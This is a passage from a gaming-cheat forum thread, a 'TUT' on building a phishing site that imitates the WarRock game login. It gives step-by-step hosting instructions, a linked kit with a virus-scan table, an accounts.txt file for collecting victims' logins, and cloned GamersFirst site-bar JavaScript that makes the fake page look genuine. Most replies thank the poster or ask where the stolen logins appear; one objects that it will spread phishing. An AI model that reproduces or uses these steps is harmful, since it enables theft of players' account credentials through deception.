Introducing MPGH's AIGA. The latest advancement in artificial intelligence. Click here now to learn more!
Page 1 of 8 123 ... LastLast
Results 1 to 15 of 117
  1. #1
    alld0n33's Avatar
    Join Date
    Feb 2009
    Posts
    97
    Reputation
    10
    Thanks
    12

    Smile [TUT] How to make a phishing site [TUT]

    Hey guys, i'm going to teach you how to make a warrock phishing site, it's really simple so don't go around buying warrock phishing sites when you can easily make your own.

    I'm gunna do it in 10 easy steps so it will be really easy.

    Before we start you are going to need to download some files that will help you on your way to making a WarRock Phishing site
    Download

    Virus Scan:


    Code:
    Antivirus  	Version  	Last Update  	Result
    AhnLab-V3	2008.12.2.0	2008.12.01	-
    AntiVir	7.9.0.36	2008.12.01	-
    Authentium	5.1.0.4	2008.12.01	-
    Avast	4.8.1281.0	2008.12.01	-
    AVG	8.0.0.199	2008.12.01	-
    BitDefender	7.2	2008.12.01	-
    CAT-QuickHeal	10.00	2008.12.01	-
    ClamAV	0.94.1	2008.12.01	-
    DrWeb	4.44.0.09170	2008.12.01	-
    eSafe	7.0.17.0	2008.11.30	-
    eTrust-Vet	31.6.6234	2008.11.28	-
    Ewido	4.0	2008.12.01	-
    F-Prot	4.4.4.56	2008.11.30	-
    F-Secure	8.0.14332.0	2008.12.01	-
    Fortinet	3.117.0.0	2008.12.01	-
    GData	19	2008.12.01	-
    Ikarus	T3.1.1.45.0	2008.12.01	-
    K7AntiVirus	7.10.539	2008.12.01	-
    Kaspersky	7.0.0.125	2008.12.01	-
    McAfee	5450	2008.11.30	-
    McAfee+Artemis	5450	2008.11.30	-
    Microsoft	1.4104	2008.12.01	-
    NOD32	3654	2008.12.01	-
    Norman	5.80.02	2008.12.01	-
    Panda	9.0.0.4	2008.12.01	-
    PCTools	4.4.2.0	2008.12.01	-
    Prevx1	V2	2008.12.01	-
    Rising	21.06.02.00	2008.12.01	-
    SecureWeb-Gateway	6.7.6	2008.12.01	-
    Sophos	4.36.0	2008.12.01	-
    Sunbelt	3.1.1832.2	2008.12.01	-
    Symantec	10	2008.12.01	-
    TheHacker	6.3.1.1.169	2008.11.29	-
    TrendMicro	8.700.0.1004	2008.12.01	-
    VBA32	3.12.8.9	2008.12.01	-
    ViRobot	2008.12.1.1494	2008.12.01	-
    VirusBuster	4.5.11.0	2008.12.01	-
    Ok so now we can start!
    Step One:
    Go to this site here and click the Sign Up tab, sign up and skip the offers

    Step Two:
    Login and click on 'My Files'

    Step Three:
    Then click on 'Create Text File'

    Step Four:
    Name the file 'accounts.txt'. DO NOT TYPE ANYTHING IN THE DESCRIPTION
    Then click Save

    Step Five:
    Go back to 'My Files' and click on 'Upload Files'

    Step Six:
    Now this is where the files you downloaded comes in; Go into the folder you downloaded and upload index.php, interface_top and warrock

    Step Seven:
    Go back to 'My Files' and click on 'Create Text File', name is g1_bar.js and in the description insert this code:

    Code:
    function show(param)
    {
        this.obj = document.getElementById(param);
        this.obj.style.display = 'block';
    }
    function hide(param)
    {
        this.obj = document.getElementById(param);
        this.obj.style.display = 'none';
    }
    
    function showBar(param, game, lang)
    {
    	if(game.indexOf("|")!=-1){
    		var str=game.split("|",2);
    		var game=str[0];
    		var funnel=str[1];
    	}
        document.write('<style type="text/css">');
        document.write('.g1_none{font-family:arial,verdana,helvetica;color:#fff;margin:0px;padding:0px;background-color:transparent;}');
        document.write('a.g1_none{font-family:arial,verdana,helvetica;color:#fff;margin:0px;padding:0px;background-color:transparent;}');
        document.write('a.g1_none:link{font-family:arial,verdana,helvetica;color:#fff;margin:0px;padding:0px;background-color:transparent;}');
        document.write('a.g1_none:hover{font-family:arial,verdana,helvetica;color:#fff;margin:0px;padding:0px;background-color:transparent;}');
        document.write('a.g1_none:visited{font-family:arial,verdana,helvetica;color:#fff;margin:0px;padding:0px;background-color:transparent;}');
        document.write('</style>');
        
        if(game=='WR')
        {
            document.write('<div class="g1_none" style="position:absolute;top:-15px;.top:0px;left:0px;z-index:100;">');
        }else{
            document.write('<div class="g1_none" style="position:absolute;top:0px;.top:0px;left:0px;z-index:100;">');
        }
        
        document.write('<div class="g1_none" id="g1_bar" style="height:57px;background:url(https://www.gamersfirs*****m/g1_bar/_img/bck.gif) repeat-x;">');
        if(game=='KOL')
        {
            document.write('<div class="g1_none" id="g1_logo_bar" style="float:left;" onmouseover="hide(\'g1_games_bar\');hide(\'g1_giveaways_bar\')">[img]https://www.gamersfirs*****m/g1_bar/_img/logo.gif[/img]</div>');
        }
        if(game=='MU')
        {
            document.write('<div class="g1_none" id="g1_logo_bar" style="float:left;" onmouseover="hide(\'g1_games_bar\');hide(\'g1_giveaways_bar\')">[img]https://www.gamersfirs*****m/g1_bar/_img/logo.gif[/img]</div>');
        }
        if(game=='RS')
        {
            document.write('<div class="g1_none" id="g1_logo_bar" style="float:left;" onmouseover="hide(\'g1_games_bar\');hide(\'g1_giveaways_bar\')">[img]https://www.gamersfirs*****m/g1_bar/_img/logo.gif[/img]</div>');
        }
        if(game=='SW')
        {
            document.write('<div class="g1_none" id="g1_logo_bar" style="float:left;" onmouseover="hide(\'g1_games_bar\');hide(\'g1_giveaways_bar\')">[img]https://www.gamersfirs*****m/g1_bar/_img/logo.gif[/img]</div>');
        }
        if(game=='WR')
        {
            document.write('<div class="g1_none" id="g1_logo_bar" style="float:left;" onmouseover="hide(\'g1_games_bar\');hide(\'g1_giveaways_bar\')">[img]https://www.gamersfirs*****m/g1_bar/_img/logo.gif[/img]</div>');
        }
        document.write('<div class="g1_none" id="g1_grad_bar" style="float:left;" onmouseover="hide(\'g1_games_bar\');hide(\'g1_giveaways_bar\')">[img]https://www.gamersfirs*****m/g1_bar/_img/grad.gif[/img]</div>');
        document.write('<div class="g1_none" id="g1_right_bar" style="float:right;">[img]https://www.gamersfirs*****m/g1_bar/_img/right.gif[/img]</div>');
        document.write('<div class="g1_none" id="g1_text_bar" style="float:right;font-family:arial,verdana,helvetica;font-size:11px;color:#fff;padding-top:9px;">');
    
        if(param=='100kjh')
        {
            document.write('My Account<span style="color:#dbe0e4;">|</span>');
            document.write('Go To Marketplace<span style="color:#dbe0e4;">|</span>');
            document.write('My Games [img]https://www.gamersfirs*****m/g1_bar/_img/arrow.gif[/img]<span style="color:#dbe0e4;">|</span>');
            document.write('G1 Giveaways [img]https://www.gamersfirs*****m/g1_bar/_img/arrow.gif[/img]|</span>');
            document.write('Logout');
        }else{
            if(lang=='tr')
            {
    			if(funnel!=1)
    			{
    	            if(game=='KOL')
    	            {
    	                document.write('Kayit Ol<span style="color:#dbe0e4;">|</span>');
    	            }
    	            if(game=='MU')
    	            {
    	                document.write('Kayit Ol<span style="color:#dbe0e4;">|</span>');
    	            }
    	            if(game=='RS')
    	            {
    	                document.write('Kayit Ol<span style="color:#dbe0e4;">|</span>');
    	            }
    	            if(game=='SW')
    	            {
    	                document.write('Kayit Ol<span style="color:#dbe0e4;">|</span>');
    	            }
    	            if(game=='WR')
    	            {
    	                document.write('Kayit Ol<span style="color:#dbe0e4;">|</span>');
    	            }
    	            
    		        document.write('G1 Nedir?<span style="color:#dbe0e4;">|</span>');
    		        document.write('Oyunlar [img]https://www.gamersfirs*****m/g1_bar/_img/arrow.gif[/img]<span style="color:#dbe0e4;">|</span>');
    		        document.write('G1 Hediyeleri [img]https://www.gamersfirs*****m/g1_bar/_img/arrow.gif[/img]');
    			}
            }else{
    			if(funnel!=1)
    			{
    	            if(game=='KOL')
    	            {
    	                document.write('Sign Up<span style="color:#dbe0e4;">|</span>');
    	            }
    	            if(game=='MU')
    	            {
    	                document.write('Sign Up<span style="color:#dbe0e4;">|</span>');
    	            }
    	            if(game=='RS')
    	            {
    	                document.write('Sign Up<span style="color:#dbe0e4;">|</span>');
    	            }
    	            if(game=='SW')
    	            {
    	                document.write('Sign Up<span style="color:#dbe0e4;">|</span>');
    	            }
    	            if(game=='WR')
    	            {
    	                document.write('Sign Up<span style="color:#dbe0e4;">|</span>');
    	            }
    				document.write('What Is G1?<span style="color:#dbe0e4;">|</span>');
    		        document.write('Games [img]https://www.gamersfirs*****m/g1_bar/_img/arrow.gif[/img]<span style="color:#dbe0e4;">|</span>');
    		        document.write('G1 Giveaways [img]https://www.gamersfirs*****m/g1_bar/_img/arrow.gif[/img]');
    			}
            }
        }
        
        document.write('</div>');
        document.write('<div class="g1_none" style="clear:both;"></div>');
        document.write('</div>');
        document.write('<div class="g1_none" id="g1_games_bar" style="padding:16px;width:254px;height:390px;background:url(https://www.gamersfirs*****m/g1_bar/_img/games_bck.gif) no-repeat;margin:-25px 100px 0px 0px;_margin:-25px 50px 0px 0px;float:right;display:none;"  onmouseover="show(\'g1_games_bar\')" onmouseout="hide(\'g1_games_bar\');">');
        document.write('<div class="g1_none" id="kol" style="margin-bottom:7px;margin-right:30px;" onmouseover="show(\'g1_games_bar\')">[img]https://www.gamersfirs*****m/g1_bar/_img/kol.jpg[/img]</div>');
        document.write('<div class="g1_none" id="gmo" style="margin-bottom:7px;margin-right:30px;" onmouseover="show(\'g1_games_bar\')">[img]https://www.gamersfirs*****m/g1_bar/_img/gmo.jpg[/img]</div>');
        document.write('<div class="g1_none" id="rs" style="margin-bottom:7px;margin-right:30px;" onmouseover="show(\'g1_games_bar\')">[img]https://www.gamersfirs*****m/g1_bar/_img/rs.jpg[/img]</div>');
        document.write('<div class="g1_none" id="sw" style="margin-bottom:7px;margin-right:30px;" onmouseover="show(\'g1_games_bar\')">[img]https://www.gamersfirs*****m/g1_bar/_img/sw.jpg[/img]</div>');
        document.write('<div class="g1_none" id="wr" style="margin-bottom:7px;margin-right:30px;" onmouseover="show(\'g1_games_bar\')">[img]https://www.gamersfirs*****m/g1_bar/_img/wr.jpg[/img]</div>');
        document.write('</div>');
        document.write('<div class="g1_none" id="g1_giveaways_bar" style="display:block;width:214px;.width:254px;height:244px;background:url(https://www.gamersfirs*****m/g1_bar/_i...eaways_bck.gif) no-repeat;margin:-25px 5px 0px 0px;padding:20px;float:right;cursor:pointer;display:none;text-align:left;" onmouseover="show(\'g1_giveaways_bar\')" onmouseout="hide(\'g1_giveaways_bar\');" onclick="window.location=\'https://www.gamersfirs*****m/g1_giveaways/\';">');
        if(lang=='tr')
        {
            document.write('<div class="g1_none" style="font-family:arial,verdana,helvetica;font-size:14px;color:#304f6a;font-weight:bold;margin-bottom:10px;" onmouseover="show(\'g1_giveaways_bar\')">61 Muhtesem Odul</div>');
            document.write('<div class="g1_none" style="font-family:arial,verdana,helvetica;font-size:11px;color:#333;" onmouseover="show(\'g1_giveaways_bar\')">12 hafta boyunca harika oduller! G1\'e simdi 
    katil ve BEDAVA oyna! 
    Bu site SoundBlaster ve Alienware tarafindan desteklenmektedir</div>');
        }else{
            document.write('<div class="g1_none" style="font-family:arial,verdana,helvetica;font-size:14px;color:#304f6a;font-weight:bold;margin-bottom:10px;" onmouseover="show(\'g1_giveaways_bar\')">61 Amazing Prizes!</div>');
            document.write('<div class="g1_none" style="font-family:arial,verdana,helvetica;font-size:11px;color:#333;" onmouseover="show(\'g1_giveaways_bar\')">12 weeks of fantastic giveaways for gamers! 
    Sign up for G1 now and enter for FREE!
    Sponsored by SoundBlaster and Alienware</div>');
        }
        document.write('</div>');
        document.write('</div>');}
    {End}
    Then save

    Step Eight:
    You now made your site, go back to 'My Files' and at the top there should be a url like this: ******.com - fast, free file hosting and website hosting
    Copy it

    Step Nine:
    Go to This link: https:// www . dot . tk (take away spaces)

    Step Ten:
    Paste the URL into the textbox and follow the instructions

    Congratulations you have now made your very own WarRock Phishing Site!!


    I hope this tutorial helped you, feel free to post your comments here
    Last edited by alld0n33; 02-20-2009 at 08:15 PM.

  2. The Following 6 Users Say Thank You to alld0n33 For This Useful Post:

    be the bomb (03-10-2009),g4sman (02-21-2009),m4tt30 (02-24-2009),nokia2 (03-11-2009),shortimidgit (03-14-2009),terry666 (03-14-2009)

  3. #2
    Obama's Avatar
    Join Date
    Dec 2008
    Gender
    male
    Location
    The Black house
    Posts
    22,195
    Reputation
    870
    Thanks
    6,076
    My Mood
    Cool
    This should be stickied nice find dude. Probably copy and paste though.

  4. #3
    alld0n33's Avatar
    Join Date
    Feb 2009
    Posts
    97
    Reputation
    10
    Thanks
    12
    lol thansk so much and no i havnt completly finished tho still need credits...my bro is a pro hackz0r he helped well...all of it lols....and ofc need to put that link lol...gonna ask ma bro but sleeping atm

  5. #4
    radnomguywfq3's Avatar
    Join Date
    Jan 2007
    Gender
    male
    Location
    J:\E\T\A\M\A\Y.exe
    Posts
    8,858
    Reputation
    381
    Thanks
    1,823
    My Mood
    Sad
    * Stickied *



    There are two types of tragedies in life. One is not getting what you want, the other is getting it.

    If you wake up at a different time in a different place, could you wake up as a different person?


  6. #5
    alld0n33's Avatar
    Join Date
    Feb 2009
    Posts
    97
    Reputation
    10
    Thanks
    12
    thanks so much my bro and me r just finding that link atm tell you when i've fixed it

  7. #6
    alld0n33's Avatar
    Join Date
    Feb 2009
    Posts
    97
    Reputation
    10
    Thanks
    12
    Ok all edited everything checked and fixed

  8. #7
    55555's Avatar
    Join Date
    Feb 2008
    Gender
    male
    Posts
    116
    Reputation
    10
    Thanks
    56
    i do all like you said but it doesnt came up a website its loading and loading

  9. #8
    moring1's Avatar
    Join Date
    Feb 2008
    Gender
    male
    Posts
    24
    Reputation
    10
    Thanks
    1
    thank you bro.
    but i have a question.
    where i can find the list of the players who log in in the website?
    Last edited by moring1; 02-21-2009 at 03:16 AM.

  10. #9
    Sjoerd's Avatar
    Join Date
    Jan 2008
    Gender
    male
    Location
    Aurora Borealis
    Posts
    16,918
    Reputation
    1272
    Thanks
    2,097
    My Mood
    Hot
    noob ur a fucken leecher,
    atleast give credits.







  11. The Following 3 Users Say Thank You to Sjoerd For This Useful Post:

    boaz (03-02-2009),g4sman (02-21-2009),terry666 (03-14-2009)

  12. #10
    Tom's Avatar
    Join Date
    Sep 2007
    Gender
    male
    Location
    in my gf's pants
    Posts
    1,861
    Reputation
    37
    Thanks
    594
    My Mood
    Cool
    Thanks. This helped me. Also Give Credits if it is not yours.

  13. #11
    XxeekXx's Avatar
    Join Date
    Aug 2008
    Posts
    526
    Reputation
    5
    Thanks
    208
    Official War Rock Website -- Account Details

    weirdly it doesnt work
    always comes out like that for me

  14. #12
    DoubleDutch's Avatar
    Join Date
    Sep 2007
    Gender
    male
    Location
    Koning
    Posts
    11,346
    Reputation
    1179
    Thanks
    1,199
    My Mood
    Bored
    Omg... more phishing sites more warrock spammers....

    thanks.. you have just release over 5000 more spammers... you shouldn't talk about phishing files in public.

  15. #13
    Sjoerd's Avatar
    Join Date
    Jan 2008
    Gender
    male
    Location
    Aurora Borealis
    Posts
    16,918
    Reputation
    1272
    Thanks
    2,097
    My Mood
    Hot
    totally agree with you.
    he didnt even give credits for it.







  16. #14
    g4sman's Avatar
    Join Date
    Jul 2008
    Posts
    102
    Reputation
    12
    Thanks
    6
    i will make it a try
    ty lol

  17. #15
    g4sman's Avatar
    Join Date
    Jul 2008
    Posts
    102
    Reputation
    12
    Thanks
    6
    lol dont works make a shiiity publicity web

    buah

Page 1 of 8 123 ... LastLast

Similar Threads

  1. I need help make a phishing site please.
    By coolio4sho in forum WarRock - International Hacks
    Replies: 20
    Last Post: 11-07-2008, 07:43 AM
  2. [How To] Make A Phishing Site
    By hitman0121 in forum WarRock - International Hacks
    Replies: 23
    Last Post: 09-07-2008, 04:09 AM
  3. [Request] Help me make a phishing site
    By tiagosoft in forum WarRock - International Hacks
    Replies: 9
    Last Post: 02-01-2008, 02:50 PM
  4. [Request]Tut how to make his own bypass
    By BurakG in forum WarRock - International Hacks
    Replies: 3
    Last Post: 05-08-2007, 02:46 PM
  5. Tut: how to make cheese
    By ace76543 in forum General
    Replies: 14
    Last Post: 01-14-2007, 09:39 AM

Tags for this Thread